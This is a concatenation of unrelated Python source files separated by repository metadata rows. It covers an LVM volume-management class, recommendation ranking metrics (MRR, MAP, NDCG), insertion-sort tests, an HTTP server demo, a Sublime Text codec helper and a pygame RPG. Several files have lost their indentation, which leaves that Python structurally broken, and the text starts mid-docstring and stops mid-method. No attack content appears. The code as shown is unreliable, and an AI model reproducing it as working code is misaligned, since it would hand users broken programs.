:param is_snapshot: whether LV is a snapshot
:param permanent: whether we should drop skipactivation flag
:raises: putils.ProcessExecutionError
"""
# This is a no-op if requested for a snapshot on a version
# of LVM that doesn't support snapshot activation.
# (Assume snapshot LV is always active.)
if is_snapshot and not self.supports_snapshot_lv_activation:
return
lv_path = self.vg_name + '/' + self._mangle_lv_name(name)
# Must pass --yes to activate both the snap LV and its origin LV.
# Otherwise lvchange asks if you would like to do this interactively,
# and fails.
cmd = ['lvchange', '-a', 'y', '--yes']
if self.supports_lvchange_ignoreskipactivation:
cmd.append('-K')
# If permanent=True is specified, drop the skipactivation flag in
# order to make this LV automatically activated after next reboot.
if permanent:
cmd += ['-k', 'n']
cmd.append(lv_path)
try:
self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error activating LV'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
@utils.retry(putils.ProcessExecutionError)
def delete(self, name):
"""Delete logical volume or snapshot.
:param name: Name of LV to delete
"""
def run_udevadm_settle():
self._execute('udevadm', 'settle',
root_helper=self._root_helper, run_as_root=True,
check_exit_code=False)
# LV removal seems to be a race with other writers or udev in
# some cases (see LP #1270192), so we enable retry deactivation
LVM_CONFIG = 'activation { retry_deactivation = 1} '
try:
self._execute(
'lvremove',
'--config', LVM_CONFIG,
'-f',
'%s/%s' % (self.vg_name, name),
root_helper=self._root_helper, run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.debug('Error reported running lvremove: CMD: %(command)s, '
'RESPONSE: %(response)s',
{'command': err.cmd, 'response': err.stderr})
LOG.debug('Attempting udev settle and retry of lvremove...')
run_udevadm_settle()
# The previous failing lvremove -f might leave behind
# suspended devices; when lvmetad is not available, any
# further lvm command will block forever.
# Therefore we need to skip suspended devices on retry.
LVM_CONFIG += 'devices { ignore_suspended_devices = 1}'
self._execute(
'lvremove',
'--config', LVM_CONFIG,
'-f',
'%s/%s' % (self.vg_name, name),
root_helper=self._root_helper, run_as_root=True)
LOG.debug('Successfully deleted volume: %s after '
'udev settle.', name)
def revert(self, snapshot_name):
"""Revert an LV from snapshot.
:param snapshot_name: Name of snapshot to revert
"""
self._execute('lvconvert', '--merge',
snapshot_name, root_helper=self._root_helper,
run_as_root=True)
def lv_has_snapshot(self, name):
cmd = LVM.LVM_CMD_PREFIX + ['lvdisplay', '--noheading', '-C', '-o',
'Attr', '%s/%s' % (self.vg_name, name)]
out, _err = self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
if out:
out = out.strip()
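            # The first Attr character is 'o'/'O' for an origin LV,
            # i.e. a volume that has at least one snapshot.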
if (out[0] == 'o') or (out[0] == 'O'):
return True
return False
def extend_volume(self, lv_name, new_size):
"""Extend the size of an existing volume."""
# Volumes with snaps have attributes 'o' or 'O' and will be
# deactivated, but Thin Volumes with snaps have attribute 'V'
# and won't be deactivated because the lv_has_snapshot method looks
# for 'o' or 'O'
if self.lv_has_snapshot(lv_name):
self.deactivate_lv(lv_name)
try:
self._execute('lvextend', '-L', new_size,
'%s/%s' % (self.vg_name, lv_name),
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error extending Volume'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
def vg_mirror_free_space(self, mirror_count):
free_capacity = 0.0
disks = []
for pv in self.pv_list:
disks.append(float(pv['available']))
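        # Greedy estimate: repeatedly consume the smallest PV and pair it
        # with matching extents taken from the largest PVs, one per mirror.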
while True:
disks = sorted([a for a in disks if a > 0.0], reverse=True)
if len(disks) <= mirror_count:
break
# consume the smallest disk
disk = disks[-1]
disks = disks[:-1]
# match extents for each mirror on the largest disks
for index in list(range(mirror_count)):
disks[index] -= disk
free_capacity += disk
return free_capacity
def vg_mirror_size(self, mirror_count):
return (self.vg_free_space / (mirror_count + 1))
def rename_volume(self, lv_name, new_name):
"""Change the name of an existing volume."""
try:
self._execute('lvrename', self.vg_name, lv_name, new_name,
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error renaming logical volume'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
| apache-2.0 | 6,120,542,646,678,303,000 | 38.223077 | 79 | 0.532915 | false |
halflings/receval | receval/metrics.py | 1 | 6033 | """
Metrics used to evaluate recommendations.
Shamelessly copied from bwhite's gist:
https://gist.github.com/bwhite/3726239
"""
import numpy as np
def reciprocal_rank(r):
"""Score is reciprocal of the rank of the first relevant item
First element is 'rank 1'. Relevance is binary (nonzero is relevant).
"""
r = np.asarray(r).nonzero()[0]
return 1. / (r[0] + 1) if r.size else 0.
def mean_reciprocal_rank(rs):
"""Mean of the reciprocal rank
Example from http://en.wikipedia.org/wiki/Mean_reciprocal_rank
>>> rs = [[0, 0, 1], [0, 1, 0], [1, 0, 0]]
>>> mean_reciprocal_rank(rs)
0.61111111111111105
>>> rs = np.array([[0, 0, 0], [0, 1, 0], [1, 0, 0]])
>>> mean_reciprocal_rank(rs)
0.5
>>> rs = [[0, 0, 0, 1], [1, 0, 0], [1, 0, 0]]
>>> mean_reciprocal_rank(rs)
0.75
Args:
rs: Iterator of relevance scores (list or numpy) in rank order
(first element is the first item)
Returns:
Mean reciprocal rank
"""
return np.mean([reciprocal_rank(r) for r in rs])
def r_precision(r):
"""Score is precision after all relevant documents have been retrieved
Relevance is binary (nonzero is relevant).
>>> r = [0, 0, 1]
>>> r_precision(r)
0.33333333333333331
>>> r = [0, 1, 0]
>>> r_precision(r)
0.5
>>> r = [1, 0, 0]
>>> r_precision(r)
1.0
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
Returns:
R Precision
"""
r = np.asarray(r) != 0
z = r.nonzero()[0]
if not z.size:
return 0.
return np.mean(r[:z[-1] + 1])
def precision_at_k(r, k):
"""Score is precision @ k
Relevance is binary (nonzero is relevant).
>>> r = [0, 0, 1]
>>> precision_at_k(r, 1)
0.0
>>> precision_at_k(r, 2)
0.0
>>> precision_at_k(r, 3)
0.33333333333333331
>>> precision_at_k(r, 4)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
ValueError: Relevance score length < k
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
Returns:
Precision @ k
Raises:
ValueError: len(r) must be >= k
"""
assert k >= 1
r = np.asarray(r)[:k] != 0
if r.size != k:
raise ValueError('Relevance score length < k')
return np.mean(r)
def average_precision(r):
"""Score is average precision (area under PR curve)
Relevance is binary (nonzero is relevant).
>>> r = [1, 1, 0, 1, 0, 1, 0, 0, 0, 1]
>>> delta_r = 1. / sum(r)
>>> sum([sum(r[:x + 1]) / (x + 1.) * delta_r for x, y in enumerate(r) if y])
0.7833333333333333
>>> average_precision(r)
0.78333333333333333
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
Returns:
Average precision
"""
r = np.asarray(r) != 0
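    # Precision evaluated at each rank that holds a relevant item.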
out = [precision_at_k(r, k + 1) for k in range(r.size) if r[k]]
if not out:
return 0.
return np.mean(out)
def mean_average_precision(rs):
"""Score is mean average precision
Relevance is binary (nonzero is relevant).
>>> rs = [[1, 1, 0, 1, 0, 1, 0, 0, 0, 1]]
>>> mean_average_precision(rs)
0.78333333333333333
>>> rs = [[1, 1, 0, 1, 0, 1, 0, 0, 0, 1], [0]]
>>> mean_average_precision(rs)
0.39166666666666666
Args:
rs: Iterator of relevance scores (list or numpy) in rank order
(first element is the first item)
Returns:
Mean average precision
"""
return np.mean([average_precision(r) for r in rs])
def dcg_at_k(r, k, method=0):
"""Score is discounted cumulative gain (dcg)
Relevance is positive real values. Can use binary
as the previous methods.
Example from
http://www.stanford.edu/class/cs276/handouts/EvaluationNew-handout-6-per.pdf
>>> r = [3, 2, 3, 0, 0, 1, 2, 2, 3, 0]
>>> dcg_at_k(r, 1)
3.0
>>> dcg_at_k(r, 1, method=1)
3.0
>>> dcg_at_k(r, 2)
5.0
>>> dcg_at_k(r, 2, method=1)
4.2618595071429155
>>> dcg_at_k(r, 10)
9.6051177391888114
>>> dcg_at_k(r, 11)
9.6051177391888114
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
k: Number of results to consider
method: If 0 then weights are [1.0, 1.0, 0.6309, 0.5, 0.4307, ...]
If 1 then weights are [1.0, 0.6309, 0.5, 0.4307, ...]
Returns:
Discounted cumulative gain
"""
r = np.asfarray(r)[:k]
if r.size:
if method == 0:
return r[0] + np.sum(r[1:] / np.log2(np.arange(2, r.size + 1)))
elif method == 1:
return np.sum(r / np.log2(np.arange(2, r.size + 2)))
else:
raise ValueError('method must be 0 or 1.')
return 0.
def ndcg_at_k(r, k, method=0):
"""Score is normalized discounted cumulative gain (ndcg)
Relevance is positive real values. Can use binary
as the previous methods.
Example from
http://www.stanford.edu/class/cs276/handouts/EvaluationNew-handout-6-per.pdf
>>> r = [3, 2, 3, 0, 0, 1, 2, 2, 3, 0]
>>> ndcg_at_k(r, 1)
1.0
>>> r = [2, 1, 2, 0]
>>> ndcg_at_k(r, 4)
0.9203032077642922
>>> ndcg_at_k(r, 4, method=1)
0.96519546960144276
>>> ndcg_at_k([0], 1)
0.0
>>> ndcg_at_k([1], 2)
1.0
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
k: Number of results to consider
method: If 0 then weights are [1.0, 1.0, 0.6309, 0.5, 0.4307, ...]
If 1 then weights are [1.0, 0.6309, 0.5, 0.4307, ...]
Returns:
Normalized discounted cumulative gain
"""
dcg_max = dcg_at_k(sorted(r, reverse=True), k, method)
if not dcg_max:
return 0.
return dcg_at_k(r, k, method) / dcg_max
if __name__ == "__main__":
import doctest
doctest.testmod()
| apache-2.0 | 4,105,317,374,910,143,000 | 27.323944 | 80 | 0.557931 | false |
weichen2046/algorithm-study | algorithms/python/test/unit/sorting/test_insertion_sort.py | 1 | 1255 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import unittest
from utils.read_data_file import read_int_array
from sorting.insertion_sort import sort
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
class InsertionSortTester(unittest.TestCase):
# Test sort in default order, i.e., in ascending order.
def test_sort_default(self):
array = read_int_array(os.path.join(BASE_DIR, 'data1.data'))
array = sort(array)
expect = [65, 76, 86, 113, 140, 417, 444, 445, 567, 589, 637, 647, 702, 864, 969]
self.assertEqual(expect, array)
# Test sort in ascending order.
def test_sort_ascending(self):
array = read_int_array(os.path.join(BASE_DIR, 'data1.data'))
array = sort(array, 'asc')
expect = [65, 76, 86, 113, 140, 417, 444, 445, 567, 589, 637, 647, 702, 864, 969]
self.assertEqual(expect, array)
# Test sort in descending order.
def test_sort_descending(self):
array = read_int_array(os.path.join(BASE_DIR, 'data1.data'))
array = sort(array, 'desc')
expect = [969, 864, 702, 647, 637, 589, 567, 445, 444, 417, 140, 113, 86, 76, 65]
self.assertEqual(expect, array)
if __name__ == '__main__':
unittest.main()
| mit | 8,115,982,328,361,374,000 | 28.186047 | 89 | 0.620717 | false |
zeroSteiner/AdvancedHTTPServer | examples/demo.py | 1 | 3045 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# demo.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import logging
from advancedhttpserver import *
from advancedhttpserver import __version__
class DemoHandler(RequestHandler):
def on_init(self):
self.handler_map['^redirect-to-google$'] = lambda handler, query: self.respond_redirect('http://www.google.com/')
self.handler_map['^hello-world$'] = self.res_hello_world
self.handler_map['^exception$'] = self.res_exception
self.rpc_handler_map['/xor'] = self.rpc_xor
def res_hello_world(self, query):
message = b'Hello World!\r\n\r\n'
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Content-Length', len(message))
self.end_headers()
self.wfile.write(message)
return
def rpc_xor(self, key, data):
return ''.join(map(lambda x: chr(ord(x) ^ key), data))
def res_exception(self, query):
raise Exception('this is an exception, oh noes!')
def main():
print("AdvancedHTTPServer version: {0}".format(__version__))
logging.getLogger('').setLevel(logging.DEBUG)
console_log_handler = logging.StreamHandler()
console_log_handler.setLevel(logging.INFO)
console_log_handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)-8s %(message)s"))
logging.getLogger('').addHandler(console_log_handler)
server = AdvancedHTTPServer(DemoHandler)
#server.auth_add_creds('demouser', 'demopass')
server.server_version = 'AdvancedHTTPServerDemo'
try:
server.serve_forever()
except KeyboardInterrupt:
server.shutdown()
return 0
if __name__ == '__main__':
main()
| bsd-3-clause | -4,253,329,966,655,596,500 | 37.544304 | 115 | 0.741544 | false |
nickgzzjr/sublime-gulp | cross_platform_codecs.py | 1 | 1500 | import sublime
import sys
import re
class CrossPlaformCodecs():
@classmethod
def decode_line(self, line):
line = line.rstrip()
decoded_line = self.force_decode(line) if sys.version_info >= (3, 0) else line
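        # Strip ANSI colour escape sequences (e.g. "\033[32m") from the output.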
decoded_line = re.sub(r'\033\[(\d{1,2}m|\d\w)', '', str(decoded_line))
return decoded_line + "\n"
@classmethod
def force_decode(self, text):
try:
text = text.decode('utf-8')
except UnicodeDecodeError:
if sublime.platform() == "windows":
text = self.decode_windows_line(text)
return text
@classmethod
def decode_windows_line(self, text):
# Import only for Windows
import locale, subprocess
# STDERR gets the wrong encoding, use chcp to get the real one
        process = subprocess.Popen(["chcp"], shell=True, stdout=subprocess.PIPE)
        (chcp, _) = process.communicate()
# Decode using the locale preferred encoding (for example 'cp1251') and remove newlines
chcp = chcp.decode(locale.getpreferredencoding()).strip()
# Get the actual number
chcp = chcp.split(" ")[-1]
# Actually decode
return text.decode("cp" + chcp)
@classmethod
def encode_process_command(self, command):
is_sublime_2_and_in_windows = sublime.platform() == "windows" and int(sublime.version()) < 3000
return command.encode(sys.getfilesystemencoding()) if is_sublime_2_and_in_windows else command | mit | -6,632,287,634,719,512,000 | 33.906977 | 103 | 0.624 | false |
sylvan5/pygame | pyrpg/pyrpg24/pyrpg24.py | 1 | 36082 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import pygame
from pygame.locals import *
import codecs
import os
import random
import struct
import sys
SCR_RECT = Rect(0, 0, 640, 480)
GS = 32
DOWN,LEFT,RIGHT,UP = 0,1,2,3
STOP, MOVE = 0, 1 # 移動タイプ
PROB_MOVE = 0.005 # 移動確率
TRANS_COLOR = (190,179,145) # マップチップの透明色
sounds = {} # サウンド
def main():
pygame.init()
screen = pygame.display.set_mode(SCR_RECT.size)
pygame.display.set_caption(u"PyRPG 24 町をつくる")
# サウンドをロード
load_sounds("data", "sound.dat")
# キャラクターチップをロード
load_charachips("data", "charachip.dat")
# マップチップをロード
load_mapchips("data", "mapchip.dat")
# マップとプレイヤー作成
map = Map("field")
player = Player("elf_female2", (1,1), DOWN)
map.add_chara(player)
# メッセージエンジン
msg_engine = MessageEngine()
# メッセージウィンドウ
msgwnd = MessageWindow(Rect(140,334,360,140), msg_engine)
# コマンドウィンドウ
cmdwnd = CommandWindow(Rect(16,16,216,160), msg_engine)
clock = pygame.time.Clock()
while True:
clock.tick(60)
if not msgwnd.is_visible and not cmdwnd.is_visible:
map.update()
msgwnd.update()
offset = calc_offset(player)
map.draw(screen, offset)
msgwnd.draw(screen)
cmdwnd.draw(screen)
show_info(screen, msg_engine, player, map) # デバッグ情報を画面に表示
pygame.display.update()
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
if event.type == KEYDOWN and event.key == K_ESCAPE:
sys.exit()
# 表示されているウィンドウに応じてイベントハンドラを変更
if cmdwnd.is_visible:
cmdwnd_handler(event, cmdwnd, msgwnd, player, map)
elif msgwnd.is_visible:
msgwnd.next() # 次ページへ
else:
if event.type == KEYDOWN and event.key == K_SPACE:
sounds["pi"].play()
cmdwnd.show()
def cmdwnd_handler(event, cmdwnd, msgwnd, player, map):
"""コマンドウィンドウが開いているときのイベント処理"""
# 矢印キーでコマンド選択
if event.type == KEYDOWN and event.key == K_LEFT:
if cmdwnd.command <= 3: return
cmdwnd.command -= 4
elif event.type == KEYDOWN and event.key == K_RIGHT:
if cmdwnd.command >= 4: return
cmdwnd.command += 4
elif event.type == KEYUP and event.key == K_UP:
if cmdwnd.command == 0 or cmdwnd.command == 4: return
cmdwnd.command -= 1
elif event.type == KEYDOWN and event.key == K_DOWN:
if cmdwnd.command == 3 or cmdwnd.command == 7: return
cmdwnd.command += 1
# スペースキーでコマンド実行
if event.type == KEYDOWN and event.key == K_SPACE:
if cmdwnd.command == CommandWindow.TALK: # はなす
sounds["pi"].play()
cmdwnd.hide()
chara = player.talk(map)
if chara != None:
msgwnd.set(chara.message)
else:
msgwnd.set(u"そのほうこうには だれもいない。")
elif cmdwnd.command == CommandWindow.STATUS: # つよさ
# TODO: ステータスウィンドウ表示
sounds["pi"].play()
cmdwnd.hide()
msgwnd.set(u"つよさウィンドウが ひらくよてい。")
elif cmdwnd.command == CommandWindow.EQUIPMENT: # そうび
# TODO: そうびウィンドウ表示
sounds["pi"].play()
cmdwnd.hide()
msgwnd.set(u"そうびウィンドウが ひらくよてい。")
elif cmdwnd.command == CommandWindow.DOOR: # とびら
sounds["pi"].play()
cmdwnd.hide()
door = player.open(map)
if door != None:
door.open()
map.remove_event(door)
else:
msgwnd.set(u"そのほうこうに とびらはない。")
elif cmdwnd.command == CommandWindow.SPELL: # じゅもん
# TODO: じゅもんウィンドウ表示
sounds["pi"].play()
cmdwnd.hide()
msgwnd.set(u"じゅもんウィンドウが ひらくよてい。")
elif cmdwnd.command == CommandWindow.ITEM: # どうぐ
# TODO: どうぐウィンドウ表示
sounds["pi"].play()
cmdwnd.hide()
msgwnd.set(u"どうぐウィンドウが ひらくよてい。")
elif cmdwnd.command == CommandWindow.TACTICS: # さくせん
# TODO: さくせんウィンドウ表示
sounds["pi"].play()
cmdwnd.hide()
msgwnd.set(u"さくせんウィンドウが ひらくよてい。")
elif cmdwnd.command == CommandWindow.SEARCH: # しらべる
sounds["pi"].play()
cmdwnd.hide()
treasure = player.search(map)
if treasure != None:
treasure.open()
msgwnd.set(u"%s をてにいれた。" % treasure.item)
map.remove_event(treasure)
else:
msgwnd.set(u"しかし なにもみつからなかった。")
def show_info(screen, msg_engine, player, map):
"""デバッグ情報を表示"""
msg_engine.draw_string(screen, (300,10), map.name.upper()) # マップ名
msg_engine.draw_string(screen, (300,40), player.name.upper()) # プレイヤー名
msg_engine.draw_string(screen, (300,70), "%d_%d" % (player.x, player.y)) # プレイヤー座標
def load_sounds(dir, file):
"""サウンドをロードしてsoundsに格納"""
file = os.path.join(dir, file)
fp = open(file, "r")
for line in fp:
line = line.rstrip()
data = line.split(",")
se_name = data[0]
se_file = os.path.join("se", data[1])
sounds[se_name] = pygame.mixer.Sound(se_file)
fp.close()
def load_charachips(dir, file):
"""キャラクターチップをロードしてCharacter.imagesに格納"""
file = os.path.join(dir, file)
fp = open(file, "r")
for line in fp:
line = line.rstrip()
data = line.split(",")
chara_id = int(data[0])
chara_name = data[1]
Character.images[chara_name] = split_image(load_image("charachip", "%s.png" % chara_name))
fp.close()
def load_mapchips(dir, file):
"""マップチップをロードしてMap.imagesに格納"""
file = os.path.join(dir, file)
fp = open(file, "r")
for line in fp:
line = line.rstrip()
data = line.split(",")
mapchip_id = int(data[0])
mapchip_name = data[1]
movable = int(data[2]) # 移動可能か?
transparent = int(data[3]) # 背景を透明にするか?
if transparent == 0:
Map.images.append(load_image("mapchip", "%s.png" % mapchip_name))
else:
Map.images.append(load_image("mapchip", "%s.png" % mapchip_name, TRANS_COLOR))
Map.movable_type.append(movable)
fp.close()
def calc_offset(player):
"""オフセットを計算する"""
offsetx = player.rect.topleft[0] - SCR_RECT.width/2
offsety = player.rect.topleft[1] - SCR_RECT.height/2
return offsetx, offsety
def load_image(dir, file, colorkey=None):
file = os.path.join(dir, file)
try:
image = pygame.image.load(file)
except pygame.error, message:
print "Cannot load image:", file
raise SystemExit, message
image = image.convert()
if colorkey is not None:
if colorkey is -1:
colorkey = image.get_at((0,0))
image.set_colorkey(colorkey, RLEACCEL)
return image
def split_image(image):
"""128x128のキャラクターイメージを32x32の16枚のイメージに分割
分割したイメージを格納したリストを返す"""
imageList = []
for i in range(0, 128, GS):
for j in range(0, 128, GS):
surface = pygame.Surface((GS,GS))
surface.blit(image, (0,0), (j,i,GS,GS))
surface.set_colorkey(surface.get_at((0,0)), RLEACCEL)
surface.convert()
imageList.append(surface)
return imageList
class Map:
# main()のload_mapchips()でセットされる
images = [] # マップチップ(ID->イメージ)
movable_type = [] # マップチップが移動可能か?(0:移動不可, 1:移動可)
def __init__(self, name):
self.name = name
self.row = -1 # 行数
self.col = -1 # 列数
self.map = [] # マップデータ(2次元リスト)
self.charas = [] # マップにいるキャラクターリスト
self.events = [] # マップにあるイベントリスト
self.load() # マップをロード
self.load_event() # イベントをロード
def create(self, dest_map):
"""dest_mapでマップを初期化"""
self.name = dest_map
self.charas = []
self.events = []
self.load()
self.load_event()
def add_chara(self, chara):
"""キャラクターをマップに追加する"""
self.charas.append(chara)
def update(self):
"""マップの更新"""
# マップにいるキャラクターの更新
for chara in self.charas:
chara.update(self) # mapを渡す
def draw(self, screen, offset):
"""マップを描画する"""
offsetx, offsety = offset
# マップの描画範囲を計算
startx = offsetx / GS
endx = startx + SCR_RECT.width/GS + 1
starty = offsety / GS
endy = starty + SCR_RECT.height/GS + 1
# マップの描画
for y in range(starty, endy):
for x in range(startx, endx):
# マップの範囲外はデフォルトイメージで描画
# この条件がないとマップの端に行くとエラー発生
if x < 0 or y < 0 or x > self.col-1 or y > self.row-1:
screen.blit(self.images[self.default], (x*GS-offsetx,y*GS-offsety))
else:
screen.blit(self.images[self.map[y][x]], (x*GS-offsetx,y*GS-offsety))
# このマップにあるイベントを描画
for event in self.events:
event.draw(screen, offset)
# このマップにいるキャラクターを描画
for chara in self.charas:
chara.draw(screen, offset)
def is_movable(self, x, y):
"""(x,y)は移動可能か?"""
# マップ範囲内か?
if x < 0 or x > self.col-1 or y < 0 or y > self.row-1:
return False
# マップチップは移動可能か?
if self.movable_type[self.map[y][x]] == 0:
return False
# キャラクターと衝突しないか?
for chara in self.charas:
if chara.x == x and chara.y == y:
return False
# イベントと衝突しないか?
for event in self.events:
if self.movable_type[event.mapchip] == 0:
if event.x == x and event.y == y:
return False
return True
def get_chara(self, x, y):
"""(x,y)にいるキャラクターを返す。いなければNone"""
for chara in self.charas:
if chara.x == x and chara.y == y:
return chara
return None
def get_event(self, x, y):
"""(x,y)にあるイベントを返す。なければNone"""
for event in self.events:
if event.x == x and event.y == y:
return event
return None
def remove_event(self, event):
"""eventを削除する"""
self.events.remove(event)
def load(self):
"""バイナリファイルからマップをロード"""
file = os.path.join("data", self.name + ".map")
fp = open(file, "rb")
# unpack()はタプルが返されるので[0]だけ抽出
self.row = struct.unpack("i", fp.read(struct.calcsize("i")))[0] # 行数
self.col = struct.unpack("i", fp.read(struct.calcsize("i")))[0] # 列数
self.default = struct.unpack("B", fp.read(struct.calcsize("B")))[0] # デフォルトマップチップ
# マップ
self.map = [[0 for c in range(self.col)] for r in range(self.row)]
for r in range(self.row):
for c in range(self.col):
self.map[r][c] = struct.unpack("B", fp.read(struct.calcsize("B")))[0]
fp.close()
def load_event(self):
"""ファイルからイベントをロード"""
file = os.path.join("data", self.name + ".evt")
# テキスト形式のイベントを読み込む
fp = codecs.open(file, "r", "utf-8")
for line in fp:
line = line.rstrip() # 改行除去
if line.startswith("#"): continue # コメント行は無視
if line == "": continue # 空行は無視
data = line.split(",")
event_type = data[0]
if event_type == "BGM": # BGMイベント
self.play_bgm(data)
elif event_type == "CHARA": # キャラクターイベント
self.create_chara(data)
elif event_type == "MOVE": # 移動イベント
self.create_move(data)
elif event_type == "TREASURE": # 宝箱
self.create_treasure(data)
elif event_type == "DOOR": # とびら
self.create_door(data)
elif event_type == "OBJECT": # 一般オブジェクト(玉座など)
self.create_obj(data)
fp.close()
def play_bgm(self, data):
"""BGMを鳴らす"""
bgm_file = "%s.mp3" % data[1]
bgm_file = os.path.join("bgm", bgm_file)
pygame.mixer.music.load(bgm_file)
pygame.mixer.music.play(-1)
def create_chara(self, data):
"""キャラクターを作成してcharasに追加する"""
name = data[1]
x, y = int(data[2]), int(data[3])
direction = int(data[4])
movetype = int(data[5])
message = data[6]
chara = Character(name, (x,y), direction, movetype, message)
self.charas.append(chara)
def create_move(self, data):
"""移動イベントを作成してeventsに追加する"""
x, y = int(data[1]), int(data[2])
mapchip = int(data[3])
dest_map = data[4]
dest_x, dest_y = int(data[5]), int(data[6])
move = MoveEvent((x,y), mapchip, dest_map, (dest_x,dest_y))
self.events.append(move)
def create_treasure(self, data):
"""宝箱を作成してeventsに追加する"""
x, y = int(data[1]), int(data[2])
item = data[3]
treasure = Treasure((x,y), item)
self.events.append(treasure)
def create_door(self, data):
"""とびらを作成してeventsに追加する"""
x, y = int(data[1]), int(data[2])
door = Door((x,y))
self.events.append(door)
def create_obj(self, data):
"""一般オブジェクトを作成してeventsに追加する"""
x, y = int(data[1]), int(data[2])
mapchip = int(data[3])
obj = Object((x,y), mapchip)
self.events.append(obj)
class Character:
"""一般キャラクタークラス"""
speed = 4 # 1フレームの移動ピクセル数
animcycle = 24 # アニメーション速度
frame = 0
# キャラクターイメージ(mainで初期化)
# キャラクター名 -> 分割画像リストの辞書
images = {}
def __init__(self, name, pos, dir, movetype, message):
self.name = name # プレイヤー名(ファイル名と同じ)
self.image = self.images[name][0] # 描画中のイメージ
self.x, self.y = pos[0], pos[1] # 座標(単位:マス)
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
self.vx, self.vy = 0, 0 # 移動速度
self.moving = False # 移動中か?
self.direction = dir # 向き
self.movetype = movetype # 移動タイプ
self.message = message # メッセージ
def update(self, map):
"""キャラクター状態を更新する。
mapは移動可能かの判定に必要。"""
# プレイヤーの移動処理
if self.moving == True:
# ピクセル移動中ならマスにきっちり収まるまで移動を続ける
self.rect.move_ip(self.vx, self.vy)
if self.rect.left % GS == 0 and self.rect.top % GS == 0: # マスにおさまったら移動完了
self.moving = False
self.x = self.rect.left / GS
self.y = self.rect.top / GS
elif self.movetype == MOVE and random.random() < PROB_MOVE:
# 移動中でないならPROB_MOVEの確率でランダム移動開始
self.direction = random.randint(0, 3) # 0-3のいずれか
if self.direction == DOWN:
if map.is_movable(self.x, self.y+1):
self.vx, self.vy = 0, self.speed
self.moving = True
elif self.direction == LEFT:
if map.is_movable(self.x-1, self.y):
self.vx, self.vy = -self.speed, 0
self.moving = True
elif self.direction == RIGHT:
if map.is_movable(self.x+1, self.y):
self.vx, self.vy = self.speed, 0
self.moving = True
elif self.direction == UP:
if map.is_movable(self.x, self.y-1):
self.vx, self.vy = 0, -self.speed
self.moving = True
# キャラクターアニメーション(frameに応じて描画イメージを切り替える)
self.frame += 1
self.image = self.images[self.name][self.direction*4+self.frame/self.animcycle%4]
def draw(self, screen, offset):
"""オフセットを考慮してプレイヤーを描画"""
offsetx, offsety = offset
px = self.rect.topleft[0]
py = self.rect.topleft[1]
screen.blit(self.image, (px-offsetx, py-offsety))
def set_pos(self, x, y, dir):
"""キャラクターの位置と向きをセット"""
self.x, self.y = x, y
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
self.direction = dir
def __str__(self):
return "CHARA,%s,%d,%d,%d,%d,%s" % (self.name,self.x,self.y,self.direction,self.movetype,self.message)
class Player(Character):
"""プレイヤークラス"""
def __init__(self, name, pos, dir):
Character.__init__(self, name, pos, dir, False, None)
def update(self, map):
"""プレイヤー状態を更新する。
mapは移動可能かの判定に必要。"""
# プレイヤーの移動処理
if self.moving == True:
# ピクセル移動中ならマスにきっちり収まるまで移動を続ける
self.rect.move_ip(self.vx, self.vy)
if self.rect.left % GS == 0 and self.rect.top % GS == 0: # マスにおさまったら移動完了
self.moving = False
self.x = self.rect.left / GS
self.y = self.rect.top / GS
# TODO: ここに接触イベントのチェックを入れる
event = map.get_event(self.x, self.y)
if isinstance(event, MoveEvent): # MoveEventなら
sounds["step"].play()
dest_map = event.dest_map
dest_x = event.dest_x
dest_y = event.dest_y
map.create(dest_map)
